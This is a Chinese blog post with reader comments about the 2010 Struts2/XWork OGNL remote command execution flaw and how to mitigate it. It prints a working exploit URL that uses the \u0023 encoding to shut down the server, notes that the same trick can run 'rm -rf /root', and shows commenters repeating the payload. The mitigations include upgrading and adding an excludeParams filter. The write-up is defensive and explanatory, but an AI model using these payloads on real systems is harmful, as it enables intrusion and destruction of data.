`
my_corner
  • 浏览: 84602 次
  • 性别: Icon_minigender_1
  • 来自: 北京
社区版块
存档分类
最新评论

Struts2/XWork 安全漏洞及解决办法

阅读更多
exploit-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏洞。
漏洞名称:Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability
相关介绍:
  • http://www.exploit-db.com/exploits/14360/
  • http://sebug.net/exploit/19954/

Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数:
?user.address.city=Bishkek&user['favoriteDrink']=kumys

ONGL将它转换为:
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")

这是通过ParametersInterceptor(参数过滤器)来执行的,使用用户提供的HTTP参数调用 ValueStack.setValue()。
为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的 unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值:
此处代码有破坏性,请在测试环境执行,严禁用此种方法进行恶意攻击
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

转义后是这样:
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1

OGNL处理时最终的结果就是
java.lang.Runtime.getRuntime().exit(1);

类似的可以执行
java.lang.Runtime.getRuntime().exec("rm –rf /root")
,只要有权限就可以删除任何一个目录。
目前尝试了3个解决方案:

1.升级到struts2.2版本。
这个可以避免这个问题,但是struts开发团队没有release这个版本(包括最新的2.2.1版本都没有release),经我测试发现新版本虽然解决了上述的漏洞,但是新的问题是strus标签出问题了。
<s:bean id="UserUtil" name="cn.com.my_corner.util.UserUtil"></s:bean>
<s:property value="#UserUtil.getType().get(cType.toString())" />

这样的标签在struts2.0中是可以使用的,但是新版中就不解析了,原因就是“#”的问题导致的,补了漏洞,正常的使用也用不了了。
所以sebug网站上的建议升级到2.2版本是不可行的。

2.struts参数过滤。
<interceptor-ref name="params">
<param name="excludeParams">.*\\u0023.*</param>
</interceptor-ref>

这个可以解决漏洞问题,缺点是工作量大,每个项目都得改struts配置文件。如果项目里,是引用的一个类似global.xml的配置文件,工作量相应减少一些。

3.在前端请求进行过滤。
比如在ngnix,apache进行拦截,参数中带有\u0023的一律视为攻击,跳转到404页面或者别的什么页面。这样做的一个前提就是没人把#号转码后作为参数传递。
请求如果是get方式,可以进行过滤,如果是post方式就过滤不到了,所以还是应该修改配置文件或更新新的jar包。

目前来看后两种是比较有效的方法,采用第三种方法比较简便。是否有另外的解决办法,欢迎大家讨论。

我并没有在windows环境下测试,有同学在windows下没有试验成功,这并不能说明windows下就没有风险可能是我们的参数或者什么地方有问题而已。既然漏洞的确存在,咱们就要重视对吧。欢迎大家测试,是否windows下漏洞不能执行成功。
分享到:
评论
79 楼 jackyrong 2012-09-12  
my_corner 写道
Aaronlong31 写道
struts2 已经针对这个问题提供了补丁,http://svn.apache.org/viewvc?view=revision&revision=956389上有下载。将com/opensymphony/xwork2/interceptor/ParametersInterceptor.java加入到自己的项目中就行了

恩 



请问是使用这个补丁,补到2.1.8上也可以么?
78 楼 lyy3323 2011-04-29  
多谢楼主,不知道怎么改strurs2的jar包。
谁能给个步骤~~~~~
77 楼 lf84730258 2011-04-15  
同样没测试成功.我把参数跟在了?后面了.
76 楼 java_user 2011-04-15  
那段参数要放在一个action后面。

我昨天赶紧升级了
75 楼 finallygo 2011-04-14  
huaihenu 写道
xxdneu 写道
http://localhost/login.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

没测试成功

struts 2.0.11
ognl 2.6

不知道是何原因


同样也是没有成功

struts 2.0.14
ognl 2.6.11

我和你用的版本一样,也没有测试成功
74 楼 gauzeehom 2011-04-14  
害得我好紧张
73 楼 邪恶八进制 2010-11-29  
这个方法是否可行呢、 直接在struts-default.xml中修改它,再重新打包回去。
72 楼 jackieban 2010-09-02  
这。。。我看不太懂
71 楼 my_corner 2010-08-27  
mlw2000 写道
struts-2.2.1已发布,修复了这个漏洞

呵呵,看到了已经Release了,不过还没有来得及实验。
70 楼 mlw2000 2010-08-17  
struts-2.2.1已发布,修复了这个漏洞
69 楼 huaihenu 2010-08-13  
xxdneu 写道
http://localhost/login.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

没测试成功

struts 2.0.11
ognl 2.6

不知道是何原因


同样也是没有成功

struts 2.0.14
ognl 2.6.11
68 楼 czxiyj 2010-08-09  
问题已经解决
67 楼 my_corner 2010-08-05  
Aaronlong31 写道
struts2 已经针对这个问题提供了补丁,http://svn.apache.org/viewvc?view=revision&revision=956389上有下载。将com/opensymphony/xwork2/interceptor/ParametersInterceptor.java加入到自己的项目中就行了

恩 
66 楼 Aaronlong31 2010-08-05  
struts2 已经针对这个问题提供了补丁,http://svn.apache.org/viewvc?view=revision&revision=956389上有下载。将com/opensymphony/xwork2/interceptor/ParametersInterceptor.java加入到自己的项目中就行了
65 楼 waterdh 2010-08-04  
看到这个go.jsp的时候,寒毛都竖起来了,整整有2g那么大。
还好现在都已经打上补丁了。
64 楼 my_corner 2010-08-04  
waterdh 写道
哪个哥们无聊在我线上的服务器上建了个go.jsp?

晕,测试玩??
汗…………都告诉大家了“此处代码有破坏性,请在测试环境执行,严禁用此种方法进行恶意攻击 ”
63 楼 waterdh 2010-08-04  
哪个哥们无聊在我线上的服务器上建了个go.jsp?
62 楼 fenlinwu 2010-08-03  
mlw2000 写道
我修改了struts2-core-2.0.11.1.jar-->
struts-default.xml-->defaultStack-->params-->excludeParams的值,
原先的值是:dojo\..*,改为:dojo\..*,.*\\u0023.*
,测试OK


我也试过了,怎么不行?
61 楼 mlw2000 2010-08-03  
我修改了struts2-core-2.0.11.1.jar-->
struts-default.xml-->defaultStack-->params-->excludeParams的值,
原先的值是:dojo\..*,改为:dojo\..*,.*\\u0023.*
,测试OK
60 楼 xxdneu 2010-08-02  
http://localhost/login.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

没测试成功

struts 2.0.11
ognl 2.6

不知道是何原因

相关推荐

    Apache的Struts2框架严重安全漏洞

    这次提到的安全漏洞主要涉及Struts2的OGNL(Object-Graph Navigation Language)表达式语言。OGNL是一种强大的表达式语言,用于获取和设置对象的属性。然而,如果框架配置不当或者没有充分过滤用户输入,攻击者可以...

    struts2-xwork-ognl的源文件(jar包)

    同时,源代码分析也能帮助开发者避免潜在的问题,如安全漏洞,例如著名的Struts2 S2-045远程代码执行漏洞,就是由于OGNL表达式不当处理导致的。因此,理解和掌握这些源代码不仅能提高开发效率,也有助于增强应用的...

    struts2.3.22所需的所有jar包解决struts2的安全漏洞问题

    Struts2是一款非常流行的Java Web框架,用于构建和维护动态网站应用程序。...总的来说,解决Struts2安全漏洞需要及时跟进框架的更新,正确替换所有相关jar包,并进行充分的测试,以确保应用的安全性和稳定性。

    XWork绕过安全限制执行任意命令漏洞补丁

    XWork是一个命令模式框架,用于支持Struts 2及其他应用。 XWork处理用户请求参数数据时存在漏洞,远程攻击者可以利用此漏洞在系统上执行任意命令。 Struts2中WebWork框架使用XWork基于HTTP参数名执行操作和调用,...

    struts2最新2.3.4.1源码

    7. **安全方面**:尽管2.3.4.1是一个较旧的版本,但Struts2团队一直致力于修复安全漏洞。例如,2017年曝光的S2-045远程代码执行漏洞,促使Struts2发布了一系列补丁,包括2.3.4.1在内的更新版本修复了这个问题。 8. ...

    Struts2最新漏洞升级2.3.32版本

    struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar 2、删除上面原有的低版本jar 3、修改 WEB-INF\classes 目录下struts.xml 文件,...

    Struts2 S2-029远程代码执行漏洞初探1

    Struts2 S2-029 远程代码执行漏洞初探 ...Struts2 S2-029 远程代码执行漏洞是一个严重的安全漏洞,需要开发者和运维人员高度警惕,遵守安全编码实践,及时更新 Struts2 版本,避免此类漏洞的出现。

    struts2.3.32lib包,漏洞修复

    Struts2.3.32库包是Apache Struts框架的一个特定版本,主要目的是修复在Struts 2中发现的安全漏洞。Apache Struts是一个流行的开源MVC(模型-视图-控制器)框架,广泛用于构建Java web应用程序。该框架极大地简化了...

    struts2-core-2.3.32和xwork-core-2.3.32

    这个版本的发布是为了修复之前版本可能存在的安全漏洞,确保应用的安全运行。 "xwork-core-2.3.32.jar"是XWork框架的实现,它提供了许多基础服务,如依赖注入、异常处理、动态方法调用等。XWork的拦截器...

    struts2.3.32修补S2-045漏洞所有核心jar包及依赖的jar(含core包)

    在本文中,我们将深入探讨标题和描述中提及的“struts2.3.32”版本,以及它如何修补了知名的S2-045安全漏洞,并介绍相关的核心组件和依赖项。 S2-045漏洞是一个严重的远程代码执行(RCE)漏洞,存在于Apache Struts...

    struts2核心jar包(漏洞已经修复)

    然而,Struts2在过去曾遭受过多个安全漏洞的影响,其中一些漏洞可能导致远程代码执行(RCE)和其他严重的安全风险。标题中的“struts2核心jar包(漏洞已经修复)”表明这是一个已经解决了已知安全问题的最新版本,...

    struts2全部的jar包

    - 对于安全考虑,定期更新Struts2到最新稳定版本,以修复已知的安全漏洞。 10. **学习路径**: 对于初学者,理解MVC模式和Action/Result机制是入门的基础。然后逐步掌握OGNL、拦截器和插件使用,最后通过实际项目...

    Struts2漏洞?

    解决Struts2漏洞通常需要及时更新Struts2框架到最新版本,因为开发者通常会在新版本中修复已知的安全问题。同时,也需要正确配置Struts2的过滤器,限制不安全的OGNL表达式,并且避免在Action配置中使用未验证的用户...

    struts2 API帮助文档

    这增加了灵活性,但同时也需要谨慎处理,防止安全漏洞。 6. **OGNL(Object-Graph Navigation Language)** - OGNL是Struts2中的表达式语言,用于在Action和视图之间传递数据。它可以访问对象的属性,执行方法,甚至...

    修复struts2的 s-45 s-46漏洞

    然而,由于其广泛使用,Struts2也成为了黑客们攻击的目标,频繁出现安全漏洞。本篇文章将深入探讨Struts2的S-45和S-46漏洞,以及如何进行修复。 S-45漏洞,全称为“Struts2 OGNL注入漏洞”,主要源于Struts2框架对...

    Struts2漏洞检测包---面工具手工检测

    1. **环境准备**:首先确保测试环境中已经部署了Struts2框架,并且该版本存在已知的安全漏洞。通常情况下,可以通过查阅官方文档或者第三方安全公告来确认。 2. **构造HTTP请求**:接下来,需要构造一个包含特定...

    Struts2最近几个漏洞分析&稳定利用Payload1

    本文主要分析了Struts2框架中的两个安全漏洞:S2-008和一个被称为“开发模式后门”的问题。这两个漏洞允许攻击者通过精心构造的输入执行任意命令,对系统造成严重威胁。 首先,我们关注S2-008漏洞。这个漏洞出现在...

    struts2必备基础jar包

    - Struts2框架历史上曾出现过安全漏洞,例如著名的CVE-2017-5638,因此及时更新Struts2版本和安全补丁至关重要。 6. **最佳实践:** - 使用最新的稳定版本。 - 遵循MVC设计模式,保持业务逻辑和视图的分离。 - ...

    struts2 最新jar包

    然而,由于其历史较长,一些安全问题也需要注意,比如著名的Struts2 S2-045漏洞,开发者应及时更新到最新版本以确保应用的安全性。这个"struts-2.1.8.1--jar包"可能不是最新的版本,因此在实际开发中,推荐使用官方...

Global site tag (gtag.js) - Google Analytics